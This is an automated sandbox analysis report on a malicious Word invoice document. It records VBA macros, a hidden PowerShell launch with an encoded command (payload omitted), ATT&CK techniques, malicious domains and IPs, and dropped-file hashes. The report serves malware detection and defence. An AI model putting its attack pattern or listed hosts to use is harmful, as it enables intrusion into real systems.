Windows
Analysis Report
INV_PO_12172019EX.doc
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w7x64
- WINWORD.EXE (PID: 1568 cmdline:
"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
- powershell.exe (PID: 2412 cmdline: Powershell -w hidden -en <base64-encoded command omitted> MD5: 852D67A27E454BD389FA7F02A8CBE23F)
- cleanup
AV Detection |
---|
Source: | ReversingLabs: | |||
Source: | Virustotal: | Perma Link |
Source: | Avira: |
Source: | Avira URL Cloud: |
Source: | Virustotal: | Perma Link |
Source: | Joe Sandbox ML: |
Source: | File opened: |
Source: | Binary string: |
Source: | File opened: |
Source: | DNS query: |
Source: | TCP traffic: |
Networking |
---|
Source: | String found in memory: |
Source: | HTTP traffic detected: |
Source: | IP Address: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: |
Source: | File created: | Jump to behavior |
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
System Summary |
---|
Source: | Screenshot OCR: |
Source: | Process created: |
Source: | OLE, VBA macro line: | ||
Source: | OLE, VBA macro: | ||
Source: | OLE, VBA macro line: |
Source: | OLE stream indicators for Word, Excel, PowerPoint, and Visio: |
Source: | OLE indicator, ObjectPool: |
Source: | OLE indicator, VBA macros: |
Source: | ReversingLabs: | ||
Source: | Virustotal: |
Source: | Process created: |
Source: | LNK file: |
Source: | OLE indicator, Word Document stream: |
Source: | WMI Queries: |
Source: | File created: | Jump to behavior |
Source: | Classification label: |
Source: | File read: | Jump to behavior |
Source: | Section loaded: |
Source: | Mutant created: |
Source: | OLE document summary: |
Source: | File read: | Jump to behavior |
Source: | Window found: |
Source: | File opened: |
Source: | Window detected: |
Source: | File opened: |
Source: | Key opened: |
Source: | File opened: |
Source: | Binary string: |
Source: | Initial sample: |
Data Obfuscation |
---|
Source: | Process created: |
Persistence and Installation Behavior |
---|
Source: | WMI Queries: |
Source: | Process information set: |
Source: | Thread sleep time: |
Source: | Thread delayed: |
Source: | Process information queried: |
Source: | Thread delayed: |
Source: | File opened: |
Source: | Binary or memory string: |
Source: | Process token adjusted: |
HIPS / PFW / Operating System Protection Evasion |
---|
Source: | Process created: |
Source: | Process created: |
Source: | Queries volume information: |
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | 11 Windows Management Instrumentation | Path Interception | 1 Process Injection | 1 Masquerading | OS Credential Dumping | 1 Security Software Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 4 Ingress Tool Transfer | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | 11 Command and Scripting Interpreter | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | 1 Disable or Modify Tools | LSASS Memory | 1 Process Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 3 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | 2 Scripting | Logon Script (Windows) | Logon Script (Windows) | 21 Virtualization/Sandbox Evasion | Security Account Manager | 21 Virtualization/Sandbox Evasion | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 3 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | 3 Exploitation for Client Execution | Logon Script (Mac) | Logon Script (Mac) | 1 Process Injection | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Protocol Impersonation | SIM Card Swap | Carrier Billing Fraud | |
Cloud Accounts | 2 PowerShell | Network Logon Script | Network Logon Script | 1 Deobfuscate/Decode Files or Information | LSA Secrets | 2 File and Directory Discovery | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | Manipulate App Store Rankings or Ratings | |
Replication Through Removable Media | Launchd | Rc.common | Rc.common | 2 Scripting | Cached Domain Credentials | 12 System Information Discovery | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | Abuse Accessibility Features |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
30% | ReversingLabs | Script-Macro.Trojan.Heuristic | ||
70% | Virustotal | Browse | ||
100% | Avira | W97M/Agent.5776312 | ||
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
100% | Joe Sandbox ML |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
2% | Virustotal | Browse | ||
8% | Virustotal | Browse | ||
9% | Virustotal | Browse | ||
1% | Virustotal | Browse |
Source | Detection | Scanner | Label | Link |
---|---|---|---|---|
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | phishing | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
0% | Avira URL Cloud | safe | ||
100% | Avira URL Cloud | phishing | ||
100% | Avira URL Cloud | malware | ||
100% | Avira URL Cloud | phishing | ||
0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
701602.parkingcrew.net | 13.248.148.254 | true | false | | high |
7arasport.com | 103.224.212.222 | true | true | | unknown |
dev2.ektonendon.gr | 162.212.129.161 | true | true | | unknown |
amstaffrecords.com | unknown | unknown | true | | unknown |
ww38.7arasport.com | unknown | unknown | true | | unknown |
diagnostica-products.com | unknown | unknown | true | | unknown |
foozoop.com | unknown | unknown | true | | unknown |
Name | Malicious | Antivirus Detection | Reputation |
---|---|---|---|
| true | | unknown |
| false | | unknown |
| true | | unknown |
Name | Source | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|
| | true | | unknown |
| | false | | high |
| | true | | unknown |
| | true | | unknown |
| | true | | unknown |
| | false | | unknown |
| | true | | unknown |
| | false | | unknown |
| | true | | unknown |
| | true | | unknown |
| | false | | high |
| | true | | unknown |
| | true | | unknown |
| | true | | unknown |
| | true | | unknown |
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
13.248.148.254 | 701602.parkingcrew.net | United States | | 16509 | AMAZON-02US | false |
103.224.212.222 | 7arasport.com | Australia | | 133618 | TRELLIAN-AS-APTrellianPtyLimitedAU | true |
162.212.129.161 | dev2.ektonendon.gr | United States | | 55293 | A2HOSTINGUS | true |
IP |
---|
192.168.2.255 |
Joe Sandbox Version: | 36.0.0 Rainbow Opal |
Analysis ID: | 800690 |
Start date and time: | 2023-02-07 18:13:09 +01:00 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 6m 50s |
Hypervisor based Inspection enabled: | false |
Report type: | light |
Cookbook file name: | defaultwindowsofficecookbook.jbs |
Analysis system description: | Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2) |
Number of analysed new started processes analysed: | 7 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: | |
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Sample file name: | INV_PO_12172019EX.doc |
Detection: | MAL |
Classification: | mal100.troj.evad.winDOC@2/19@6/4 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: | |
Cookbook Comments: |
- Exclude process from analysis (whitelisted): dllhost.exe, wisptis.exe, conhost.exe
- Execution Graph export aborted for target powershell.exe, PID 2412 because it is empty
- Not all processes were analyzed, report is missing behavior information
- Report size getting too big, too many NtCreateFile calls found.
- Report size getting too big, too many NtQueryAttributesFile calls found.
- Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description |
---|---|---|
18:13:25 | API Interceptor |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7FD181C6.wmf
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 444 |
Entropy (8bit): | 3.2627072103345656 |
Encrypted: | false |
SSDEEP: | 12:Mh86p058QYNAPzSxsfb0R4EXSvCzSN+uztl:O905TZzSWfbUYvn7xl |
MD5: | 11D3F9A2B8772B00E439701105F9E8EF |
SHA1: | 19F7EDC5F445A9A54827570476F06835BAF9EBB8 |
SHA-256: | 60A14153FAC78B3EE62D0E5418F76DD4AA3A723EBC52622D7DF5A12FC3A44A60 |
SHA-512: | 48F13B0FA31B8FA0EC89047A3F0B42A9DC72114692AEEC276D4F54FF72548F421C8BB3BB3398B7C47BB6AB39E5F835CBDFC34AB50A856C439145C68ECA136EDE |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A3AE7B0F.wmf
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 444 |
Entropy (8bit): | 2.99722014911087 |
Encrypted: | false |
SSDEEP: | 12:Mh86p058QYNAPzSxsfb0R4EXSvCzSNCruztl:O905TZzSWfbUYvnbxl |
MD5: | DB2FD781DF517D35D27E6B53B22624F0 |
SHA1: | F756270EE429D39C5719D936677D090F9407C5BE |
SHA-256: | 7A7F34B2D7F284921D09B7D0810B9662FC712B5783333CEB6CCDE2A69A67C698 |
SHA-512: | E8C84F43CA1E7B3C9A08FD0DF40376C2CAC8B0AB3D18F44CAF39510E86611D886FC74EDF32A524C9DE06DEA2E0F2420E796897703095D328340434662DD4C14D |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{4D8C8B4D-2408-4479-B193-86C1187A3D7D}.tmp
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 40960 |
Entropy (8bit): | 5.128863223295907 |
Encrypted: | false |
SSDEEP: | 768:3P0zasWmNf4gZ6OPpAkrbfzHSS+hr4fXuPA9TltJHdUdppiXlcSRVkhpchcHicHf:fUasZfzZ9PpAkrbfzHSS+hr4fXz/H6dt |
MD5: | DFD24CBE556204FDA04E205C1D98862B |
SHA1: | C0A16296134D92A489DD50329E7BB3FAF60A6B8E |
SHA-256: | 5A8FA0E0D1F96021CD3B501B2D736004B4AF2549F98BE08A987232E8B55DFDC0 |
SHA-512: | E37347A89C793A88646E6CB61386CDFFBFC7A06159795FE0EA7C61D19F8E31BA65180C7CB432E5D1B77D84DD67596BCC997A41301EE983568656104F33BD0013 |
Malicious: | false |
Reputation: | low |
Preview: |
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{98B5056E-1AC7-42C9-BDDC-599C5AB91B4A}.tmp
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1024 |
Entropy (8bit): | 0.05390218305374581 |
Encrypted: | false |
SSDEEP: | 3:ol3lYdn:4Wn |
MD5: | 5D4D94EE7E06BBB0AF9584119797B23A |
SHA1: | DBB111419C704F116EFA8E72471DD83E86E49677 |
SHA-256: | 4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1 |
SHA-512: | 95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4 |
Malicious: | false |
Reputation: | high, very likely benign file |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 111460 |
Entropy (8bit): | 4.944876294992553 |
Encrypted: | false |
SSDEEP: | 1536:rgoD5EyP3uLmO7PTpJNTMf+zw1n/+JDoOii/UNx3UEPqB4dBH:rxP3kmOf/NTMRn/+5/Grqi |
MD5: | 845A290401571DFC12E05E2FF969DFC6 |
SHA1: | 837CC20C2A302CC48404BB6D762D54C8834F12D2 |
SHA-256: | 3C0D99443446B0517258BA8846B9EB4B04C09CEED2E3F4677DDA1F6E26D5A8DB |
SHA-512: | AF24AC05BF79FEECCD8176F7B419F69D5D13DC7830E2732AADF3C00AA89728E2191F3A8B5AB60A6A5562ECE1B6D3F82D2D3F9D70AAE5579013CF5A774E9EACB3 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 166724 |
Entropy (8bit): | 4.37296320699445 |
Encrypted: | false |
SSDEEP: | 1536:IU+zL6wNSc8SetKB4YuiMOqK/WVMO+O9sOHK7K2xBmsqsDPza7vKp:IPjNSc83tKBduiMnAOXTK7K1Kp |
MD5: | F22C81C73CE8DDFDCAA8D16031E935BB |
SHA1: | 5A1B8B5F859652067794926CCD5547FEE8AAF1BD |
SHA-256: | F042CD4DD958DE038353AADED933F9D87C4493BC3BF25EA2B965C6CC078249BB |
SHA-512: | 20771EE51CDB267C47F6C85A90335609156F5BA052B0478BC56E8B2526A469BC93E227BEE05FC0E44470AF26A38D8C1CF93E8AE1F466BF126AE33DA756236442 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 98816 |
Entropy (8bit): | 4.80498431928288 |
Encrypted: | false |
SSDEEP: | 3072:ajTjzxfDLcUaOBsnRmsAqgeindy/O7svT06CER6MrVd8w:ajTjzVDQUaOBsnRmsAqgeidWvTA |
MD5: | 8EA37B0DD197D80D0B6092428925E595 |
SHA1: | AA525DF7BE573F549F2F8C9C9B6702B284935CEE |
SHA-256: | 397ABFA5376C024D8FF06FDF47D908EB40E658FEB63BD6296877CFAB286C073B |
SHA-512: | BFA29CBABD8D5370DC34F2DFE3B19EAFCC549FAA25787FBC2C9E549A6D14D423C949875FA60E1A879DF1546CDB23486EA5566B81267AB75EF5DC7C987F8AD549 |
Malicious: | true |
Antivirus: | |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 512 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:: |
MD5: | BF619EAC0CDF3F68D496EA9344137E8B |
SHA1: | 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5 |
SHA-256: | 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 |
SHA-512: | DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 512 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:: |
MD5: | BF619EAC0CDF3F68D496EA9344137E8B |
SHA1: | 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5 |
SHA-256: | 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 |
SHA-512: | DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 9728 |
Entropy (8bit): | 3.5003324374730655 |
Encrypted: | false |
SSDEEP: | 192:+ALpx9kUlMSWcVdWrPjbpVBKt/hzh7c5vRNAwdq6UicQ2DWl5i:+OpxiUySWcSRVO/h97chcHicQ2DWL |
MD5: | 3B6BF2E49B8C92085C7E72F1CF422332 |
SHA1: | 046A48AC1248673AA5F5AE5EE53910B488C481DC |
SHA-256: | 4AC2D5F6BAA0615028B78F7CEA348A7D33156178819C0CCC4DC50A521DCAEC4A |
SHA-512: | 03A6232D49846C85CF53398C35C304438ACE954997AAFA9987865F778FF8786D0D3DF1B84900A91C1A7065B65225DA44391B3F0CB10F5262243D7F90F6D44134 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1536 |
Entropy (8bit): | 1.1464700112623651 |
Encrypted: | false |
SSDEEP: | 3:YmsalTlLPltl2N81HRQjlORGt7RQ//W1XR9//3R9//3R9//:rl912N0xs+CFQXCB9Xh9Xh9X |
MD5: | 72F5C05B7EA8DD6059BF59F50B22DF33 |
SHA1: | D5AF52E129E15E3A34772806F6C5FBF132E7408E |
SHA-256: | 1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164 |
SHA-512: | 6FF1E2E6B99BD0A4ED7CA8A9E943551BCD73A0BEFCACE6F1B1106E88595C0846C9BB76CA99A33266FFEC2440CF6A440090F803ABBF28B208A6C7BC6310BEB39E |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 512 |
Entropy (8bit): | 0.0 |
Encrypted: | false |
SSDEEP: | 3:: |
MD5: | BF619EAC0CDF3F68D496EA9344137E8B |
SHA1: | 5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5 |
SHA-256: | 076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560 |
SHA-512: | DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 115588 |
Entropy (8bit): | 4.951590765318803 |
Encrypted: | false |
SSDEEP: | 1536:7DQgURfP3uLmO7PTpJNTMf+h2QM1n/+JDoOii/UNxFolBBEPqB4VLH:7KP3kmOf/NTMygn/+5/GMBUq0 |
MD5: | B6E732A65BDAD5D366D4C0F62C3CB9C5 |
SHA1: | F88A3FED47CF1AC9BB895FF79D464A3888529835 |
SHA-256: | D9DEDA2BF34AD45FA2FF76F132E63F3EB3AEA4F0F13DD12A60D5FD285A2B6EC1 |
SHA-512: | 600DD295089FAF0054129B0D61B1A2766AD85F1CED826290C13C00170955D7599A96C400BAACD3FA87292CE3E17C9C4A4DC638A0725CD2D48F25666DA53BD017 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1049 |
Entropy (8bit): | 4.546704366097275 |
Encrypted: | false |
SSDEEP: | 24:8GdMdk/XT89dqQlikIIK/retigkIIK5Dv3qEu7D:8O/XTkhizp6zaE0D |
MD5: | 6A947D3CBF076D416F2D48F2533139F1 |
SHA1: | 77E8B65317A9733473D9C03DB08ED956A4DCBDB0 |
SHA-256: | 5DA8224BC3329298673EDFAEAEE6C66CF25B084F0765D2EA739E0A3B114BE0B3 |
SHA-512: | 48877D4C028EFDC7BCC4E000C50FCE9A00FBB7A6F2233698BE4D2DF865097E8056B9D13069D6A526A0821F81CB7B206BBE790B103D101A6D0592CBB7440DE72B |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 85 |
Entropy (8bit): | 4.883240648927214 |
Encrypted: | false |
SSDEEP: | 3:bDuMJl0eq8GgLFomX1Kz61q8GgLFov:bC2ggLFiz61ggLFy |
MD5: | 7AA28BB4ED2C12561AB9348E324D1F06 |
SHA1: | 75A42F9AFF6AA1B0831B449F7B659A9114DFB9AE |
SHA-256: | 832F210041FC9C8554018D869A63A8D9114C9A11DA3219238E266CB4D0A57CCA |
SHA-512: | 5F92ABA58A409ACB9F9D479899D9EF5F01CD6C7C4B4F7241A8168BB5EF95ABB54DE8978BD7587F545977E03CAEBA9CB81831996B17098EB8675A53EB373306AB |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll |
MD5: | D9C8F93ADB8834E5883B5A8AAAC0D8D9 |
SHA1: | 23684CCAA587C442181A92E722E15A685B2407B1 |
SHA-256: | 116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11 |
SHA-512: | 7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8016 |
Entropy (8bit): | 3.583147657409058 |
Encrypted: | false |
SSDEEP: | 96:chQCNAPXMqIqvsqvJCwoSz8hQCNAPXMqIqvsEHyqvJCworkzsKPrY1HFyuyrBKPW:cofRoSz8ofJHnorkzsKud+BKojp |
MD5: | 292F304870BE5532F0EF707A59FD2F19 |
SHA1: | FD7EF902B0E44F4E7187B34156CC61D56A25E7F8 |
SHA-256: | 2F7EE2660521FC2D367CE89E05FC58728EC17635DB254A51AF980DA54E9BFE46 |
SHA-512: | 57270A0CACF1929380EDCBF2691D2C521F0A9948ECE43C36090F7D2B08F1A2F102AB812AA31A04776BB59CB446B36CD7D852A4561A398CEBBAC4910AF2582DED |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LDV95WB5GH1Q7ECQYL9V.temp
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8016 |
Entropy (8bit): | 3.583147657409058 |
Encrypted: | false |
SSDEEP: | 96:chQCNAPXMqIqvsqvJCwoSz8hQCNAPXMqIqvsEHyqvJCworkzsKPrY1HFyuyrBKPW:cofRoSz8ofJHnorkzsKud+BKojp |
MD5: | 292F304870BE5532F0EF707A59FD2F19 |
SHA1: | FD7EF902B0E44F4E7187B34156CC61D56A25E7F8 |
SHA-256: | 2F7EE2660521FC2D367CE89E05FC58728EC17635DB254A51AF980DA54E9BFE46 |
SHA-512: | 57270A0CACF1929380EDCBF2691D2C521F0A9948ECE43C36090F7D2B08F1A2F102AB812AA31A04776BB59CB446B36CD7D852A4561A398CEBBAC4910AF2582DED |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll |
MD5: | D9C8F93ADB8834E5883B5A8AAAC0D8D9 |
SHA1: | 23684CCAA587C442181A92E722E15A685B2407B1 |
SHA-256: | 116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11 |
SHA-512: | 7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.586615503838857 |
TrID: |
File name: | INV_PO_12172019EX.doc |
File size: | 188839 |
MD5: | 3b7fa78ebf399bb0230590bfec589fa7 |
SHA1: | 199d4646fdbf9b5167d80ed71ce0ea406c40b018 |
SHA256: | 5c2dc72128d235ecdca49e4026ec782cdce9021c5b46ebf841000bab5ebcc129 |
SHA512: | c1936fad69a8231b5e39f8a757d469af2487c3f40944ce9b20094d2924510f6fff341ae7123cc179bd8419a68ed28ba4b0dd4c500b9d6cccd6339d23c8c480af |
SSDEEP: | 3072:752y/GdynktGDWLS0HZWD5w8K7Nk9uD7IBUOUasgt+PpkkrbfzHQfzZExXMHIwtN:752k43tGiL3HJk9uD7bOUasFPpkkrbfE |
TLSH: | CE04AE0435C1BD8BEF9612314BCBEFBA2218BC952D59D25B7249B73D6F304A0D992B21 |
File Content Preview: | ........................>.......................................................N.............................................................................................................................................................................. |
Icon Hash: | e4eea2aaa4b4b4a4 |
Document Type: | OLE |
Number of OLE Files: | 1 |
Has Summary Info: | |
Application Name: | Microsoft Office Word |
Encrypted Document: | False |
Contains Word Document Stream: | True |
Contains Workbook/Book Stream: | False |
Contains PowerPoint Document Stream: | False |
Contains Visio Document Stream: | False |
Contains ObjectPool Stream: | True |
Flash Objects Count: | 0 |
Contains VBA Macros: | True |
Code Page: | 1252 |
Title: | |
Subject: | |
Author: | |
Keywords: | |
Comments: | |
Template: | |
Last Saved By: | |
Revision Number: | 1 |
Total Edit Time: | 0 |
Create Time: | 2019-12-17 19:30:00 |
Last Saved Time: | 2019-12-17 19:30:00 |
Number of Pages: | 1 |
Number of Words: | 5 |
Number of Characters: | 34 |
Creating Application: | |
Security: | 0 |
Document Code Page: | 1252 |
Number of Lines: | 1 |
Number of Paragraphs: | 1 |
Thumbnail Scaling Desired: | False |
Company: | |
Contains Dirty Links: | False |
Shared Document: | False |
Changed Hyperlinks: | False |
Application Version: | 1048576 |
General | |
Stream Path: | Macros/VBA/Bnzailenjg |
VBA File Name: | Bnzailenjg.bas |
Stream Size: | 10499 |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . Q . Q . . . . . . . . . . ~ . . . |
General | |
Stream Path: | Macros/VBA/Fbkxcpydi |
VBA File Name: | Fbkxcpydi.frm |
Stream Size: | 1168 |
Data ASCII: | . . . . . . . . H . . . . . . L . . . O . . . . . . . . . . . . . . 9 Z . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . ( . . . . . S P . . . . S . . . . . S . . . . . S . . . . . . . . . . . . 0 . { . 6 . 1 . 6 . 0 . 8 . F . F . 3 . - . A |
General | |
Stream Path: | Macros/VBA/Vidpgeil |
VBA File Name: | Vidpgeil.cls |
Stream Size: | 3353 |
Data ASCII: | . . . . . % . . . . . . . . . . 7 . . . " . . . < . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . D . . . z . Z F . . x . J . 2 X E ; . < . h . . . . . . . . . . . . . . . . . . . . . + + . O 3 J < . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . ! . L x i j u p n g v , 0 , 0 , M S F o r m s , T e x t B o x . + + . O 3 J < . . z . Z F . . x . . . . M E . . . . . . . . . . . . . . . . . . . . . . . P . . . . . S " . . . . S . . . . . S " . . . . s . . . . . 6 " . . |
General | |
Stream Path: | \x5DocumentSummaryInformation |
File Type: | data |
Stream Size: | 280 |
Entropy: | 2.3907762904521577 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . & . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . T i t l e . . . . . . |
General | |
Stream Path: | \x5SummaryInformation |
File Type: | data |
Stream Size: | 424 |
Entropy: | 3.311907066926082 |
Base64 Encoded: | False |
Data ASCII: | . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . x . . . . . . . . . . . . . . . . . . d . . . . . . . . . . . . . . L . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . , . . . . . . . 4 . . . . . . . < . . . . . . . D . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m . . . . . . . . . . . . . . . . . . . . . |
General | |
Stream Path: | 1Table |
File Type: | ARC archive data, crunched |
Stream Size: | 7024 |
Entropy: | 5.881578643954767 |
Base64 Encoded: | True |
